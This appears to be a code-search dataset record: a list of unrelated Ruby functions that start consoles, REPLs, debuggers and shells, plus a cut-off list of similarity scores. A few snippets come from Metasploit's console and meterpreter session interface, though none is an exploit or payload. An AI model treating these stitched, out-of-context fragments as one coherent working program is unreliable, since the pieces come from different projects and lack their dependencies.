"def setup(name=nil, show_constants=true)\n unless name\n tf = RubyVM::Frame.get(1)\n name = File.basename(tf.source_container[1], '.rb')\n end\n if ARGV.size > 0 && ARGV[0] == 'debug'\n require_relative '../lib/trepanning'\n dbgr = Trepan.new\n dbgr.debugger\n else\n dbgr = MockDebugger.new\n end\n\n cmds = dbgr.core.processor.commands\n cmd = cmds[name]\n cmd.proc.frame_setup(RubyVM::Frame::get(1))\n show_special_class_constants(cmd) if show_constants\n\n def cmd.confirm(prompt, default)\n true\n end\n def cmd.errmsg(message, opts={})\n puts \"Error: #{message}\"\n end\n def cmd.msg(message, opts={})\n puts message\n end\n def cmd.msg_nocr(message, opts={})\n print message\n end\n def cmd.section(message, opts={})\n puts \"Section: #{message}\"\n end\n\n return dbgr, cmd\n end",
"def start\n require 'irbtools'\n end",
"def initialize(workspace = nil, input_method = nil)\n @context = Context.new(self, workspace, input_method)\n @context.main.extend ExtendCommandBundle\n @signal_status = :IN_IRB\n @scanner = RubyLex.new\n end",
"def start(options={})\n in_xterm_state(options) do\n initialize_screen\n yield self\n event_loop\n end\n end",
"def start\n Vedeu.trigger(:_drb_start_)\n\n Vedeu::Terminal.open do\n Vedeu::Terminal.set_cursor_mode\n\n Vedeu.trigger(:_initialize_)\n\n runner { main_sequence }\n end\n end",
"def start_repl\n require 'readline'\n\n loop do\n line = Readline.readline '>> ', true\n puts \"=> #{eval_ruby line, '(opal)'}\"\n end\n end",
"def with_cli(cli); end",
"def initialize(run, xml)\n @run = run\n\n parse_xml(xml)\n end",
"def initialize(session, workspace = nil, input_method = nil, output_method = nil)\n @session = session\n if workspace\n @workspace = workspace\n else\n @workspace = WorkSpace.new\n end\n @thread = Thread.current if defined? Thread\n #@pry_level = 0\n\n # copy of default configuration\n @ap_name = Pry.conf[:AP_NAME]\n @rc = Pry.conf[:RC]\n @load_modules = Pry.conf[:LOAD_MODULES]\n\n @use_readline = Pry.conf[:USE_READLINE]\n @verbose = Pry.conf[:VERBOSE]\n @io = nil\n\n self.inspect_mode = Pry.conf[:INSPECT_MODE]\n self.math_mode = Pry.conf[:MATH_MODE] if Pry.conf[:MATH_MODE]\n self.use_tracer = Pry.conf[:USE_TRACER] if Pry.conf[:USE_TRACER]\n self.use_loader = Pry.conf[:USE_LOADER] if Pry.conf[:USE_LOADER]\n self.eval_history = Pry.conf[:EVAL_HISTORY] if Pry.conf[:EVAL_HISTORY]\n\n @ignore_sigint = Pry.conf[:IGNORE_SIGINT]\n @ignore_eof = Pry.conf[:IGNORE_EOF]\n\n @back_trace_limit = Pry.conf[:BACK_TRACE_LIMIT]\n\n self.prompt_mode = Pry.conf[:PROMPT_MODE]\n\n if Pry.conf[:SINGLE_IRB] or !defined?(Pry::JobManager)\n @pry_name = Pry.conf[:PRY_NAME]\n else\n @pry_name = Pry.conf[:PRY_NAME]+\"#\"+Pry.JobManager.n_jobs.to_s\n end\n @pry_path = \"(\" + @pry_name.to_s + \")\"\n\n case input_method\n when nil\n case use_readline?\n when nil\n if (defined?(ReadlineInputMethod) && STDIN.tty? &&\n Pry.conf[:PROMPT_MODE] != :INF_RUBY)\n @io = ReadlineInputMethod.new\n else\n @io = StdioInputMethod.new\n end\n when false\n @io = StdioInputMethod.new\n when true\n if defined?(ReadlineInputMethod)\n @io = ReadlineInputMethod.new\n else\n @io = StdioInputMethod.new\n end\n end\n\n when String\n @io = FileInputMethod.new(input_method)\n @pry_name = File.basename(input_method)\n @pry_path = input_method\n else\n @io = input_method\n end\n self.save_history = Pry.conf[:SAVE_HISTORY] if Pry.conf[:SAVE_HISTORY]\n\n if output_method\n @output_method = output_method\n else\n @output_method = StdioOutputMethod.new\n end\n\n @echo = Pry.conf[:ECHO]\n if @echo.nil?\n @echo = true\n end\n self.debug_level = Pry.conf[:DEBUG_LEVEL]\n end",
"def initialize\n DebugOutput.debug_level = DEBUG_LEVEL\n\n @is_running = false\n\n @parser = Parser.new self\n @tokenizer = Tokenizer.new\n @symbol_table = SymbolTable.new\n\n init_constants\n end",
"def initialize\n root = Rush::Dir.new('/')\n home = Rush::Dir.new(ENV['HOME']) if ENV['HOME']\n pwd = Rush::Dir.new(ENV['PWD']) if ENV['PWD']\n\n @config = Rush::Config.new\n\n @history = Coolline::History.new config.history_file.full_path\n\n @readline = Coolline.new do |c|\n c.transform_proc = proc { syntax_highlight c.line }\n c.completion_proc = proc { complete c.completed_word }\n end\n\n @box = Rush::Box.new\n @pure_binding = @box.instance_eval \"binding\"\n $last_res = nil\n\n eval config.load_env, @pure_binding\n\n commands = config.load_commands\n Rush::Dir.class_eval commands\n Array.class_eval commands\n\n # Multiline commands should be stored somewhere\n @multiline_cmd = ''\n end",
"def irb\n ARGV.clear\n require 'irb'\n IRB.setup nil\n IRB.conf[:MAIN_CONTEXT] = IRB::Irb.new.context\n require 'irb/ext/multi-irb'\n IRB.irb nil, self\n end",
"def interactive_parser ( )\n puts 'Press <Enter> to exit...'\n #\n # Цикл обработки ввода.\n loop {\n\tstr = interactive_input( )\n\tbreak if str == \"\"\n\t#\n\t# Цикл посимвольной классификаци.\n\tstr.bytes.each do |c|\n\t parse( c.chr )\n\t puts 'parser: ' + @parserstate\n\t puts 'symbol: ' + interactive_output( c.chr ).to_s\n\t puts 'buffer: ' + @buffer.to_s\n\t puts 'state: ' + @chain.last.statename\n\t puts\n\tend\n }\n end",
"def start\n require File.dirname(__FILE__) + '/wirb/irb' if defined?(IRB)\n @running = true\n rescue LoadError\n warn \"Couldn't activate Wirb\"\n end",
"def initialize\n @viewport = Viewport.new(0,0,Graphics.width,Graphics.height)\n @viewport.z = 99999\n # Initialize shell options if not set\n $ShellOptions ||= ShellOptions.load\n # Get the active config. If none is found, use the default config.\n if !$ShellOptions.activeConfig || !$ShellOptions.shellConfigs.has_key?($ShellOptions.activeConfig)\n $ShellOptions.shellConfigs['default'] ||= ShellConfiguration.newDefault\n $ShellOptions.activeConfig = 'default'\n end\n @config = $ShellOptions.shellConfigs[$ShellOptions.activeConfig]\n # Create the console window and set the available commands.\n @window = ConsoleWindow.new(self,@viewport.rect)\n @prompt = @config.prompt\n @aliases = $ShellOptions.shellAliases\n @commands = {}\n self.set_commands\n @context = nil\n self.main\n end",
"def init\n require File.expand_path( '../irbtools.rb', File.dirname(__FILE__) )\n end",
"def initialize # :notnew:\n evaluate PRELUDE, PRELUDE_PATH, 1\n global.Johnson.runtime = self\n global['Ruby'] = Object\n evaluate CORE, CORE_PATH, 1\n end",
"def initialize\n @display = XlibObj::Display.new(':0')\n @root = Root.new(@display)\n @formatter = if ARGV.include?('--yambar')\n YambarFormatter.new\n else\n Formatter.new(Configuration.new)\n end\n end",
"def initialize(rstream)\n\t\tsuper\n\n\t\t#\n\t\t# Initialize the meterpreter client\n\t\t#\n\t\tself.init_meterpreter(rstream)\n\n\t\t#\n\t\t# Create the console instance\n\t\t#\n\t\tself.console = Rex::Post::Meterpreter::Ui::Console.new(self)\n\tend",
"def run\n src = ARGF.read\n exit 2 unless src\n\n interpreter = Expectr::Interpreter.new(src.untaint)\n interpreter.filename = $FILENAME\n interpreter.run\n end",
"def interactive_generator\n webGui = WebGui.new(\"\")\n webGui.start\nend",
"def initialize(bin_file = \"sqlplus\")\n @bin_file = bin_file\n @tail = \"\"\n @busy = false\n @start_marker, @end_marker, @cancel_marker = [2.chr, 3.chr, 4.chr]\n @process = ChildProcess.build(@bin_file, \"/nolog\")\n # On Unix we may abort the currently executing query by sending a\n # INT signal to the Sqlplus process, but we need access to the \n # send_term private method.\n class << @process; public :send_signal; end if ChildProcess.unix?\n @process.duplex = true\n @process.detach = true\n @process.io.inherit!\n @io_read, @io_write = VoraxIO.pipe\n @process.io.stdout = @io_write\n @process.start\n @process.io.stdin.sync = true\n @current_funnel = nil\n @default_convertor_name = nil\n @registered_convertors = {:vertical => Output::VerticalConvertor,\n :pagezip => Output::PagezipConvertor,\n :tablezip => Output::TablezipConvertor}\n # warm up\n sleep 0.2\n # set the blockterm as the end_marker. The blockterm should\n # not be touch by the Vorax user, otherwise nasty things\n # may happen. This is also a workaround to mark the end of\n # output when the \"echo\" setting of sqlplus is \"on\". See the\n # implementation of pack().\n send_text(\"\\n#set blockterm \\\"#@end_marker\\\"\\n\")\n end",
"def start\n parse!\n run\n end",
"def initialize(arguments, gdb: 'gdb')\n gdb_bin = ::GDB::Util.which(gdb)\n raise Errno::ENOENT, gdb if gdb_bin.nil?\n\n arguments = \"--command=#{File.join(SCRIPTS_PATH, 'gdbinit.py')} #{arguments}\" # XXX\n @tube = spawn(\"#{gdb_bin} #{arguments}\")\n pre = @tube.readuntil('GDBRuby:')\n @prompt = @tube.readuntil(\"\\n\").strip\n @tube.unget(pre + @tube.readuntil(@prompt))\n end",
"def initialize(prompt = DefaultPrompt, prompt_char = DefaultPromptChar, opts = {})\n\n\t\t# Choose a readline library before calling the parent\n\t\trl = false\n\t\trl_err = nil\n\t\tbegin\n\t\t\tif(opts['RealReadline'])\n\t\t\t\trequire 'readline'\n\t\t\t\trl = true\n\t\t\tend\n\t\trescue ::LoadError\n\t\t\trl_err = $!\n\t\tend\n\n\t\t# Default to the RbReadline wrapper\n\t\trequire 'readline_compatible' if(not rl)\n\n\t\thistfile = opts['HistFile'] || Msf::Config.history_file\n\n\t\t# Call the parent\n\t\tsuper(prompt, prompt_char, histfile)\n\n\t\t# Temporarily disable output\n\t\tself.disable_output = true\n\n\t\t# Load pre-configuration\n\t\tload_preconfig\n\n\t\t# Initialize attributes\n\t\tself.framework = opts['Framework'] || Msf::Simple::Framework.create\n\n\t\t# Initialize the user interface to use a different input and output\n\t\t# handle if one is supplied\n\t\tif (opts['LocalInput'] or opts['LocalOutput'])\n\t\t\tinit_ui( opts['LocalInput'], opts['LocalOutput'])\n\t\telse\n\t\t\tinit_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new)\n\t\tend\n\t\tinit_tab_complete\n\n\t\t# Add the core command dispatcher as the root of the dispatcher\n\t\t# stack\n\t\tenstack_dispatcher(CommandDispatcher::Core)\n\n\t\t# Report readline error if there was one..\n\t\tif not rl_err.nil?\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: Unable to load readline: #{rl_err}\")\n\t\t\tprint_error(\"* Falling back to RbReadLine\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\t\t# Add the database dispatcher if it is usable\n\t\tif(framework.db.usable)\n\t\t\trequire 'msf/ui/console/command_dispatcher/db'\n\t\t\tenstack_dispatcher(CommandDispatcher::Db)\n\t\telse\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: No database support: #{framework.db.error.class} #{framework.db.error}\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\n\t\tbegin\n\t\t\trequire 'openssl'\n\t\trescue ::LoadError\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits\")\n\t\t\tprint_error(\"* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\t\t# Register event handlers\n\t\tregister_event_handlers\n\n\t\t# Load console-specific configuration\n\t\tload_config(opts['Config'])\n\n\t\t# Re-enable output\n\t\tself.disable_output = false\n\n\t\t# Load additional modules as necessary\n\t\tself.framework.modules.add_module_path(opts['ModulePath'], false) if opts['ModulePath']\n\n\t\t# Whether or not command passthru should be allowed\n\t\tself.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true\n\n\t\t# Disables \"dangerous\" functionality of the console\n\t\t@defanged = opts['Defanged'] == true\n\n\t\t# If we're defanged, then command passthru should be disabled\n\t\tif @defanged\n\t\t\tself.command_passthru = false\n\t\tend\n\n\t\t# Process things before we actually display the prompt and get rocking\n\t\ton_startup\n\n\t\t# Process the resource script\n\t\tif opts['Resource'] and opts['Resource'].kind_of? Array\n\t\t\topts['Resource'].each { |r|\n\t\t\t\tload_resource(r)\n\t\t\t}\n\t\telse\n\t\t\t# If the opt is nil here, we load ~/.msf3/msfconsole.rc\n\t\t\tload_resource(opts['Resource'])\n\t\tend\n\tend",
"def open_session(iter)\n Msf::Ui::Gtk2::Console::Shell.new(iter)\n end",
"def initialize(exe, output, user_input=nil)\n @output = output\n @prompted = false\n @faulted = false\n @user_input = user_input\n @found_search = false\n @pending_expression = nil\n listen exe\n end",
"def start_run; end",
"def initialize(settings={})\n @breakpoint = nil\n @settings = Trepanning::DEFAULT_SETTINGS.merge(settings)\n @input ||= @settings[:input]\n @output ||= @settings[:output]\n\n @processor = CmdProcessor.new(self)\n\n @intf = [Trepan::UserInterface.new(@input, @output)]\n @settings[:cmdfiles].each do |cmdfile|\n add_command_file(cmdfile)\n end if @settings.member?(:cmdfiles)\n Dir.chdir(@settings[:initial_dir]) if @settings[:initial_dir]\n @restart_argv = @settings[:restart_argv]\n\n ## FIXME: put in fn\n @processor.dbgr = self\n ## m = Rubinius::Loader.method(:debugger).executable.inspect\n meth = Rubinius::VM.backtrace(0)[0].method\n @processor.ignore_methods[meth] = 'next'\n @processor.ignore_methods[method(:debugger)] = 'step'\n\n @thread = nil\n @frames = []\n ## FIXME: Delete these and use the ones in processor/default instead.\n @variables = {\n :show_bytecode => false,\n :highlight => false\n }\n\n @loaded_hook = proc { |file|\n check_deferred_breakpoints\n }\n\n @added_hook = proc { |mod, name, exec|\n check_deferred_breakpoints\n }\n\n # Use a few Rubinius specific hooks to trigger checking\n # for deferred breakpoints.\n\n Rubinius::CodeLoader.loaded_hook.add @loaded_hook\n Rubinius.add_method_hook.add @added_hook\n\n @deferred_breakpoints = []\n\n @history_path = File.expand_path(\"~/.trepanx\")\n\n if File.exists?(@history_path)\n File.readlines(@history_path).each do |line|\n Readline::HISTORY << line.strip\n end\n @history_io = File.new(@history_path, \"a\")\n else\n @history_io = File.new(@history_path, \"w\")\n end\n\n @history_io.sync = true\n\n @root_dir = ROOT_DIR\n\n # Run user debugger command startup files.\n add_startup_files unless @settings[:nx]\n add_command_file(@settings[:restore_profile]) if \n @settings[:restore_profile] && File.readable?(@settings[:restore_profile])\n end",
"def initialize(opts = {})\n @host = opts[:host] || @@rserve[:host] || DEF_RSERVE_HOST\n @port = opts[:port] || @@rserve[:port] || DEF_RSERVE_PORT\n @connection_state = :unknown\n\n @is_processing = false\n @last_eval_line = nil\n\n @process_queue = []\n @version = nil\n @version_cbk = nil\n\n si = File.read(File.join(File.dirname(__FILE__), 'session_init.R'))\n eval(si) do |state, msg|\n if state == :ok\n @version = msg.to_ruby\n @version_cbk.call(version) if @version_cbk\n @version_cbk = nil\n #puts \"IIINIT> #{@version}\"\n else\n error \"Couldn't initialize RServe - #{msg}\"\n end\n end\n\n debug \"Attempting to connect to Rserve\"\n EventMachine::connect @host, @port, RServConnection do |c|\n @connection = c\n @protocol = Protocol.new(c)\n c.on_new_state do |state|\n debug \"Connection state: \", state\n @connection_state = state\n _process_queue\n end\n end\n end",
"def execute_command\n begin\n if @cgi.has_key?('type') then\n doc = REXML::Document.new\n command = doc.add_element 'COMMAND'\n @cgi.params.each_pair { |key,value| command.attributes[key]=value}\n xmlCommand = doc.to_s\n socket = TCPSocket.new(@host,@port)\n socket.puts xmlCommand \n xmlResult = socket.gets.chop\n docResult = REXML::Document.new xmlResult\n end\n rescue\n puts 'Probleem bij uitvoeren commando'\n exit\n end\n end",
"def setup()\n @strm = IO::popen(\"#{@commandPath} #{@commandOpts}\",'r+') ;\n call(\"display2d:false;\")\n call(\"linel:1000000000;\")\n end",
"def cmd_irb(*args)\n expressions = []\n\n # Parse the command options\n @@irb_opts.parse(args) do |opt, idx, val|\n case opt\n when '-e'\n expressions << val\n when '-h'\n return cmd_irb_help\n end\n end\n\n session = client\n framework = client.framework\n\n if expressions.empty?\n print_status(\"Starting IRB shell\")\n print_status(\"The 'client' variable holds the hwbridge client\\n\")\n\n Rex::Ui::Text::IrbShell.new(binding).run\n else\n expressions.each { |expression| eval(expression, binding) }\n end\n end",
"def program() @program end",
"def open_irb(options, argv)\n tm_lib = File.dirname(__FILE__) + '/../../../ticketmaster.rb'\n irb_name = RUBY_PLATFORM =~ /mswin32/ ? 'irb.bat' : 'irb' \n requires = \"-r rubygems -r #{tm_lib} \"\n cmd = ''\n if File.exist?(config = File.expand_path(options[:config]))\n ENV['TICKETMASTER_CONFIG']=config\n end\n providers = !options[:provider].nil? ? [options[:provider]] : YAML.load_file(config).keys\n providers.delete 'default'\n require 'rubygems'\n require 'ticketmaster'\n providers.inject(requires) do |mem, p|\n begin\n require \"ticketmaster-#{p}\"\n requires << \"-r ticketmaster-#{p} \"\n rescue Exception => exception\n #puts exception\n begin\n require \"#{p}\"\n requires << \"-r #{p} \"\n rescue Exception => exception\n warn \"Could not require the '#{p}' provider. Is it installed?\"\n end\n end\n end\n cmd << \"#{irb_name} #{requires} --simple-prompt #{ARGV.join(' ')}\"\n exec cmd\nend",
"def console; end",
"def console; end",
"def start(options={},&block)\n @stdout = options[:stdout] || $stdout\n @stderr = options[:stdout] || @stdout\n @stdin = options[:stdin] || $stdin\n while line = @stdin == $stdin ? Readline.readline(\"> \", true) : @stdin.gets \n line.strip!\n next if line.length==0\n parse_tree_node = parser.parse line\n if parse_tree_node\n evaluate parse_tree_node, &block\n else\n errputs parser.parser_failure_info :verbose => true\n end\n end\n end",
"def initialize\n @console = CLI::Console.new(HighLine.new)\n @vending_machine = VendingMachine.new\n @money_in_progress = []\n end",
"def initialize path = \"#{Dir.tmpdir}/live-rb\" \n raise Exception.new(\"Another session sems to be running: #{path}\") if File.exist? path\n puts Notice.new(\"Live Session: #{path}\")\n\n %x{mkfifo #{path}}\n @pipe, @path, @key_bindings = File.open(path, 'r+'), path, {}\n\n begin\n new_context and key_listen and run!\n ensure\n File.delete(path) if File.exists? path\n end\n end",
"def run\n if @options[:standalone]\n puts get_compile_command\n output_watcher = OutputWatcher.new(\"mxmlc \" + get_compile_command)\n output_watcher.stdout.each_line do |line|\n puts \" -->\\t\" + line\n end\n \n output = output_watcher.stderr\n errors = MxmlcOutputReader.new(output)\n \n @report = HtmlMxmlcErrorFormatter.new(errors)\n write_report!\n open_browser\n \n else\n output = run_mxmlc\n errors = @fcsh.errors\n \n message = \"Complete: %d errors, %d warnings\" % [errors.errors.size, errors.warnings.size]\n puts message\n error_array = errors.messages.map {|x| {\"filename\" => x.filename, \"line\" => x.line, \"level\" => x.level, \"message\" => x.message, \"content\" => x.content, \"column\" => x.column } }\n @server.send JSON.generate(error_array)\n @growl.notify \"ruby-growl Notification\", \"Textmate FCSH\", message\n end\n \n\n \n end",
"def wake_bixsby\n # Initiate new ProgramB instance\n # Load in properties and add new AIML node to ProgramB\n bixsby_print \"Loading ProgramB version #{Programb::VERSION}\"\n @bixsby = Programb::Kernel.new(\"./config/properties.yml\")\n @bixsby.parser[\"bixsby\"] = @bixsby.method(:process_bixsby)\n\n # Load modules and AIML\n # Loads the guts for Bixsby\n load_modules\n load_aiml\n\n # Start loop for server commands\n @console = Console.new\n\n bixsby_print \"Good day sir, I am up and running.\\nType '\\\\h' to see a list of my commands.\"\n\n # Main loop\n # Listens for connections and initates a new thread for the client.\n loop {\n Thread.start(@server.accept) do |client|\n session_id = set_session\n \n bixsby_print \"Established new connection: #{Time.now.to_s}, session_id: #{session_id}, client: #{client.peeraddr.last}\"\n \n @connections[:clients][session_id] = client\n \n greeting_msg = @bixsby.respond(\"Hello\")\n formatted_response = package_response(session_id, greeting_msg)\n\n client.puts(formatted_response)\n bixsby_listen(client)\n end\n }\n end",
"def create_repl\n @pry_fiber = Fiber.new do\n loop do\n @input = Input.new\n @output = Output.new\n\n Pry.start(@object, :input => @input, :output => @output)\n end\n end\n\n handle_fiber # wait until we're asked for the first line of input\n end",
"def initialize\n @map = nil\n @turn_number = 0\n\n @did_setup = false\n\n @stdin = if File.exists?('debugger_input')\n STDERR.puts \"Using debugger input!\"\n File.open('debugger_input')\n else\n STDIN\n end\n\n @stdout = STDOUT\n end",
"def _init(explaination='no explaination given', initial_debug_state = $DEBUG_INIT)\n $RELOAD_DEBUG = false # \n deb \"pre init '#{explaination}'\" if $RELOAD_DEBUG\n $INIT_DEBUG = false # dice se debuggare la mia intera infrastruttura o no...\n $RELOADED_ONCE = 0 # aiuta a capuire quante volte includo sta cazo di lib! Sempre 2!!!\n $RIC_LIB_MODULES = %w{ classes/debug_ric } # to be explicitly included in this order.\n $HOME = File.expand_path('~')\n $DEBUG ||= initial_debug_state \n $PROG = File.basename($0)\n case $PROG\n when 'irb'\n print \"[DEB] Welcome to Sakura within IRB! Happy playing. Try 'Sakuric.VERSION'\"\n when 'ruby'\n print \"[DEB] Welcome to Sakura within RUBY! Happy playing. Try 'Sakuric.VERSION'\"\n default\n # do nothing\n end\n \n ################################################################################\t\n # Path to riccardo's Library... Library stuff\n $LOAD_PATH << './lib' \n $LOAD_PATH << \"#{$SAKURADIR}/lib/\"\n\n # BEWARE: ORDER *IS* RELEVANT!\n $RICLIB = Hash.new unless defined?($RICLIB)\n $RICLIB['VERSION'] = $RICLIB_VERSION\n $RICLIB['libs'] ||= []\n $RICLIB['nreloaded'] ||= 0\n $RICLIB['nreloaded'] += 1 \n $RICLIB['help'] =<<-BURIDONE\nThis library contains all my enciclopedic knowledge (that is, notionistic). :\nFinally solved the bug of double inclusion (crisbio, files included this!)\nBURIDONE\n\n load_sakura_modules!(initial_debug_state)\n $CONF = RicConf.new()\n pyellow($CONF.info()) if debug?() \n puts \"post init delle #{Time.now}\" if $RELOAD_DEBUG\n print \"Sakuric.n_called(): #{ Sakuric.n_called() }\"\nend",
"def initialize\n @console = Console.new\n end",
"def reload\n msg = '# Reloading the console...'\n puts CodeRay.scan(msg, :ruby).term\n Pry.save_history\n exec(\"./#{__FILE__}\")\nend",
"def start_cli\n puts hello\n quit = false\n while not quit\n line = gets.strip!\n\n quit = true if line == 'quit'\n action = take_cmd(@cli_cmds, line, @jid)\n unless quit\n output = action.call\n puts output unless output.nil?\n end\n end\n end",
"def initialize(interpreter)\n @app = interpreter\n @state = :ready\n @state_arg = nil\n end",
"def command_start; end",
"def command_start; end",
"def command_start; end",
"def reload\n reload_msg = '# Reloading the console...'\n files = $LOADED_FEATURES.select { |feat| feat =~ /\\/croesus\\// }\n files.each { |file| load file }\n puts CodeRay.scan(reload_msg, :ruby).term\n exec($0)\nend",
"def irb(*args, &blk)\n __shell 'irb', *args, &blk\n end",
"def initialize(iter)\n # Style\n console_style = File.join(driver.resource_directory, 'style', 'console.rc')\n Gtk::RC.parse(console_style)\n\n # Call the parent\n super(Gtk::Window::TOPLEVEL)\n\n # initialize the session var from the iter sessions tree\n @session = iter[O_SESSION]\n\n # Layout stuff\n self.set_default_size(500, 400)\n self.set_border_width(10)\n\n # Set title with the tunnel peer\n self.set_title(@session.tunnel_peer)\n\n # Add a vertical box to the window\n vbox = Gtk::VBox.new(false, 5)\n self.add(vbox)\n\n # Setup text view and buffer\n @textview = Gtk::TextView.new\n if iter[O_BUFFER].nil?\n @buffer = Gtk::TextBuffer.new\n iter[O_BUFFER] = @buffer\n else\n @buffer = iter[O_BUFFER]\n end\n scrolled_window = Gtk::ScrolledWindow.new\n scrolled_window.add(@textview)\n vbox.pack_start(scrolled_window, true, true, 5)\n scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)\n\n # Setup text buffer\n @textview.set_buffer(@buffer)\n @textview.editable = true\n @textview.set_cursor_visible(true)\n @buffer.create_mark('end_mark', @buffer.end_iter, false)\n\n # Setup button close\n hbox = Gtk::HButtonBox.new\n hbox.layout_style = Gtk::ButtonBox::END\n @button_close = Gtk::Button.new(Gtk::Stock::CLOSE)\n\n # Pack\n hbox.pack_end(@button_close, false, false, 5)\n vbox.pack_start(hbox, false, false, 0)\n\n # Signal for the Return key pressed\n signal_connect('key_press_event') do |edit, event|\n on_key_pressed(event)\n end\n\n # Create the pipe interface\n @pipe = Rex::IO::BidirectionalPipe.new\n\n # Start the session interaction\n @t_run = Thread.new do\n @session.interact(@pipe, @pipe)\n end\n\n # Create a subscriber with a callback for the UI\n @sid = @pipe.create_subscriber_proc() do |data|\n insert_text(Rex::Text.to_utf8(data))\n end\n\n # Init an history object\n @historic = History.new()\n\n # Init the prompt variable with the session type\n @type = @session.type\n\n # Display all\n self.show_all\n\n end",
"def console=(_arg0); end",
"def console=(_arg0); end",
"def raw_cib\n @raw_cib = cibadmin '-Q'\n if @raw_cib == '' or not @raw_cib\n fail 'Could not dump CIB XML using \"cibadmin -Q\" command!'\n end\n @raw_cib\n end",
"def init_iruby\n @adapter.init_iruby\n end",
"def record_shell_interaction(commands)\n ShellSimulator.new(commands).capture_output do\n load VIRTUAL_SHELL_PROGRAM\n end\nend",
"def run_irb close_operation = JFrame::HIDE_ON_CLOSE # DISPOSE_ON_CLOSE ?\n STDERR.puts \"RubyConsole run_irb called\"\n text = javax.swing.JTextPane.new\n text.font = RubyConsole.find_font 'Monospaced', Font::PLAIN, 14, 'Menlo', 'Monaco', 'Andale Mono'\n text.margin = java.awt.Insets.new(8, 8, 8, 8)\n text.caret_color = Color.new(0xa4, 0x00, 0x00)\n text.background = Color.new(0xf2, 0xf2, 0xf2)\n text.foreground = Color.new(0xa4, 0x00, 0x00)\n\n @irb_pane = javax.swing.JScrollPane.new\n @irb_pane.viewport_view = text\n\n @file_button = javax.swing.JButton.new \"Load file\"\n\n pane = javax.swing.JPanel.new java.awt.GridBagLayout.new\n pane.add(@irb_pane, AwtUtil.getConstraints(0, 0, 1, 1, 4, 1, true, true))\n pane.add(@file_button, AwtUtil.getConstraints(0, 3, 1, 0, 1, 1, false, true))\n\n# enableEvents(WindowEvent.WINDOW_CLOSING);\n @file_button.addActionListener(self)\n\n @frame = JFrame.new \"Moneydance Interactive JRuby #{JRUBY_VERSION} Console \" +\n \"(tab will autocomplete)\"\n @frame.default_close_operation = close_operation\n @frame.set_size 800, 800\n @frame.content_pane.add pane # @frame.add pane\n\n header = \" MD - Moneydance context: ComMoneydanceAppsMdController::Main \\n\" +\n \" ROOT - Moneydance root account: ComMoneydanceAppsMdModel::RootAccount \\n\" +\n \" TRANS - Moneydance TransactionSet: ComMoneydanceAppsMdModel::TransactionSet \\n\\n\"\n\n readline = org.jruby.demo.TextAreaReadline.new text, header\n JRuby.objectspace = true # useful for code completion\n readline.hook_into_runtime_with_streams(JRuby.runtime)\n\n EventQueue.invoke_later proc { show }\n\n ARGV << '--readline' << '--prompt' << 'inf-ruby'\n IRB.start(__FILE__)\n @ruby_main.cleanup\n end",
"def initialize(shell)\n\t\tsuper\n\tend",
"def start_server\n erl = CliRunner.open 'skirmish_server', 'erl', /\\d>/, /Eshell/\n erl << \"code:add_path(\\\"#{server_dir}/ebin\\\").\" >> /true/\n erl << \"application:start(skirmish_server).\" >> /ok/\n @automation_server = erl\n log.info(\"Automation#start_server\") { \"server started\" }\n end",
"def setup_context\n self['console'] = Console.new\n load RUNTIME_PATH\n\n opal = self['opal']\n opal['loader'] = Loader.new opal, self\n opal['fs'] = FileSystem.new opal, self\n opal['platform']['engine'] = 'opal-gem'\n\n # eval \"opal.require('core');\", \"(opal)\"\n require_file 'core'\n end",
"def initialize\n begin\n require 'readline'\n @have_readline = true\n @history_save = true\n rescue LoadError, ArgumentError\n @have_readline = false\n @history_save = false\n end\n end",
"def setup_drb_objects\n require 'nitro/session/drb'\n @session_cache = SyncHash.new \n DRb.start_service(\"druby://#{Session.cache_address}:#{Session.cache_port}\", @session_cache) \n puts \"Drb session cache at druby://#{Session.cache_address}:#{Session.cache_port}.\"\n end",
"def init # entry method to the CLI \n greeting \n menu_list\n menu_selection\nend",
"def initialize(args = ARGV)\n @options, *_paths = Options.new.parse(args)\n @term = Terminal.new(debug: @options[:debug])\n @cached_processors = {}\n # TODO: Set timezone according to remote IP.\n Time.zone = 'Asia/Seoul'\n end",
"def initialize(config)\n STDOUT.sync = true\n \n super()\n \n puts \"Console (ec2x-agent #{Ec2x::Config.version})\"\n\n @config = config\n @delegator = Ec2x::CommandDelegator.new(@config)\n end",
"def execute *args\n self.executable = :amxmlc\n super\n end",
"def exec; end",
"def exec; end",
"def initialize\r\n puts 'Welcome to the class browser program.'\r\n @input = ''\r\n\r\n end",
"def initialize(command_line)\n parse(command_line)\n end",
"def initialize\n @prompt = TTY::Prompt.new\n end",
"def start_drb_server\r\n drb_server = DRb.start_service(\r\n \"druby://#{@drb_server_host}:#{@drb_server_port}\")\r\n @drb_server_uri = drb_server.uri\r\n @log.info(\"Watir Grid started on : #{@drb_server_uri}\")\r\n end",
"def init\n @calls = []\n @accept_nodes = []\n @connected_nodes = nil\n @remote_bash_code = nil\n end",
"def initialize( prompt = false )\n\n\t\t@prompt = prompt\n\t\t\n\t\t# This string is only assigned when a quick command created via an \n\t\t# instance of Command. More through \n\t\t@code = yield if block_given?\n\n\tend"
] |
[
"0.65019333",
"0.64288914",
"0.6155321",
"0.60915166",
"0.60181373",
"0.59680706",
"0.59327716",
"0.59311205",
"0.58957195",
"0.58705044",
"0.5767094",
"0.575434",
"0.5736025",
"0.5735212",
"0.5720628",
"0.56802",
"0.5676554",
"0.56409335",
"0.56183326",
"0.5579454",
"0.55589616",
"0.5504897",
"0.54979324",
"0.5496175",
"0.5493404",
"0.54918855",
"0.54744095",
"0.5467938",
"0.54539317",
"0.54527193",
"0.545138",
"0.54387283",
"0.5421928",
"0.54047847",
"0.5402103",
"0.5397482",
"0.53918463",
"0.5387356",
"0.5379707",
"0.5377374",
"0.537558",
"0.53724384",
"0.53716224",
"0.5371299",
"0.537002",
"0.53692806",
"0.53652954",
"0.5356997",
"0.5342589",
"0.53422743",
"0.5319434",
"0.5309576",
